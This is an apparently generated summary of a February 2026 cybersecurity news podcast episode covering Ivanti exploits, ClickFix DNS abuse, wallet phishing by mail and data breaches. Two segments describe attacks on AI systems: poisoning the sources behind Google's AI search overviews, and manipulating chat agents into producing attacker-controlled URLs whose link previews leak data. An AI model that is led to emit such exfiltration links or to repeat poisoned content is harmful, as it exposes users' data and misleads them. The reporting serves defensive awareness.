Cybersecurity Headlines - Detailed Episode Summary

Podcast: CISO Series: Cybersecurity Headlines
Host: Steve Prentiss
Date: February 16, 2026
Episode: Ivanti Actor Identified, Search Overviews Manipulated, ClickFix Leverages Nslookup

Episode Overview

This episode covers major new cyber threats and incidents in the infosec arena, including details about a principal threat actor behind Ivanti RCE attacks, the exploitation of Google’s AI search summaries by scammers, novel DNS abuse in social engineering campaigns, ongoing hardware wallet phishing via snail mail, and the latest data privacy incidents. Throughout, Steve Prentiss delivers a concise, matter-of-fact breakdown of each story, with input from leading cybersecurity researchers and official company sources.

Key Discussion Points & Insights

1. Ivanti Endpoint Manager Mobile Exploitation

• [00:09 - 01:00]
  • A single threat actor using an IP address on bulletproof hosting infrastructure is behind over 83% of recent exploit activity targeting two Ivanti Endpoint Manager Mobile vulnerabilities (active zero-day exploits).
  • Greynoise intelligence connected the activity to the "Prospero"-hosted bulletproof system, which is known to target multiple software products.
  • Quote:
    "A single IP address hosted on bulletproof infrastructure is responsible for more than 83% of exploitation activity related to vulnerabilities." – Steve Prentiss ([00:12])

2. Manipulation of Google’s AI Search Overviews

• [01:01 - 01:54]
  • Scammers are injecting malicious content into Google’s AI-generated search summaries by gaming information sources.
  • Techniques include creating fake customer service portals, promoting counterfeit products, and circulating convincingly worded misinformation.
  • Users are urged to treat AI search overviews as “a starting point that requires verification, rather than as a definitive answer.”
  • Quote:
    "Google's AI Overviews feature is being weaponized by scammers who have figured out how to inject deliberately harmful information into its AI generated search summaries." – Steve Prentiss ([01:05])

3. ClickFix Social Engineering & Abuse of Nslookup

• [01:55 - 02:53]
  • Microsoft warns of attackers tricking users into running NSLookup commands that contact an external DNS server—not the system’s default.
  • This “ClickFix” technique obfuscates attacks, blending malicious traffic into normal DNS requests and bypassing common web request monitoring.
  • Quote:
    "Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic." – Microsoft Threat Intelligence Team ([02:22])

4. Snail Mail Phishing Targets Trezor and Ledger Users

• [02:54 - 03:29]
  • Physical mail campaigns are urging users of Trezor and Ledger hardware wallets to submit their recovery phrases for a fake "authentication check."
  • Letters feature convincing branding and threaten users with loss of device functionality unless they act urgently.
  • Connection drawn to prior data breaches at both companies, which may have exposed user contact info.
  • Memorable Moment:
    “The letters include company logos and other letterhead features, warning users to complete the process by yesterday… or risk losing functionality…” ([03:03])

5. Estonia’s Spy Chief Calls for Offensive Cyber Investment

• [04:02 - 04:35]
  • Kalpu Rosin, Estonia’s foreign intelligence chief, urges Europe to develop indigenous offensive cyber tools at the Munich Cybersecurity Conference, warning of over-reliance on non-European resources.
  • Notes modern intelligence depends not just on defense, but on “the ability to penetrate, disrupt or manipulate adversaries’ digital systems.”
  • Quote:
    “Europe is focused on defence, while modern intelligence and security operations increasingly depend on the ability to penetrate, disrupt or manipulate adversaries’ digital systems.” – Kalpu Rosin ([04:21])

6. Privacy Fallout: Ring Cancels Partnership with Flock

• [04:36 - 05:14]
  • After consumer backlash linked to a Ring Super Bowl ad, Ring cancels partnership plans with Flock Safety (police surveillance tech).
  • The ad’s suggestion that Ring cameras could help track lost pets using facial recognition prompted fears over mass surveillance.
  • Ring maintains relationships with other surveillance companies, such as Axon.
  • Memorable Moment:
    “The wording of the ad raised questions about how the facial recognition enabled cameras could also be used to surveil and monitor the movements of people.” ([04:59])

7. Dutch Telco Odido Data Breach

• [05:15 - 05:46]
  • Odido, the Netherlands’ largest mobile operator, reports a breach possibly impacting 6.2 million people, involving PII and bank account data.
  • No passwords, call details, billing/location data, or ID scans reportedly compromised.
  • Notified the Dutch Data Protection Authority immediately after detection.
  • Quote:
    “The data affected includes PII and bank account numbers… passwords, call details, billing or location data, or scans of ID documents could not have been accessed.” ([05:25])

8. AI Agents Abused for Data-Leaking Links in Messaging Apps

• [05:47 - 06:38]
  • Prompt Armor researchers find that AI chatbots in messaging platforms can be manipulated into sending URLs which, when previewed by services like Slack or Telegram, leak sensitive data automatically—no user clicks required.
  • Proliferation of “zero-click” exploits in chat interfaces highlights need for extra security against automated preview features.
  • Quote:
    "These link previews can turn URLs generated by an AI agent and controlled by an attacker into a zero click data exfiltration channel." – Steve Prentiss ([06:07])

Notable Quotes & Memorable Moments (with timestamps)

• "Google's AI Overviews feature is being weaponized by scammers…" – Steve Prentiss ([01:05])
• "Using DNS in this way reduces dependency on traditional web requests…" – Microsoft ([02:22])
• "The letters include company logos and other letterhead features…" ([03:03])
• "Europe is focused on defence, while modern intelligence and security operations increasingly depend on the ability to penetrate, disrupt or manipulate adversaries’ digital systems." – Kalpu Rosin ([04:21])
• "The wording of the ad raised questions about how the facial recognition enabled cameras could also be used to surveil and monitor the movements of people." – Steve Prentiss ([04:59])
• "These link previews can turn URLs generated by an AI agent and controlled by an attacker into a zero click data exfiltration channel." – Steve Prentiss ([06:07])

Segment Timestamps for Reference

• [00:09] — Ivanti RCE threat actor identified
• [01:01] — Google AI Overviews manipulated
• [01:55] — ClickFix/NSLookup DNS attacks
• [02:54] — Trezor/Ledger snail mail phishing
• [04:02] — Estonia pushes for offensive cyber capability
• [04:36] — Ring/Flock partnership canceled after ad backlash
• [05:15] — Odido data breach
• [05:47] — AI agents create data-leaking links in chat apps

Tone and Language

Steve Prentiss’s delivery is clear, urgent, and pragmatic, emphasizing the immediacy and risks inherent in each headline. Direct expert statements and practical warnings are given in a succinct yet informative style, mirroring the fast-paced tone of cybersecurity news cycles.

This episode is essential listening for infosec professionals keen to stay ahead of evolving attack vectors—from AI exploitation to DNS-based payload delivery—along with critical updates on privacy policy, data breaches, and global cyber strategy.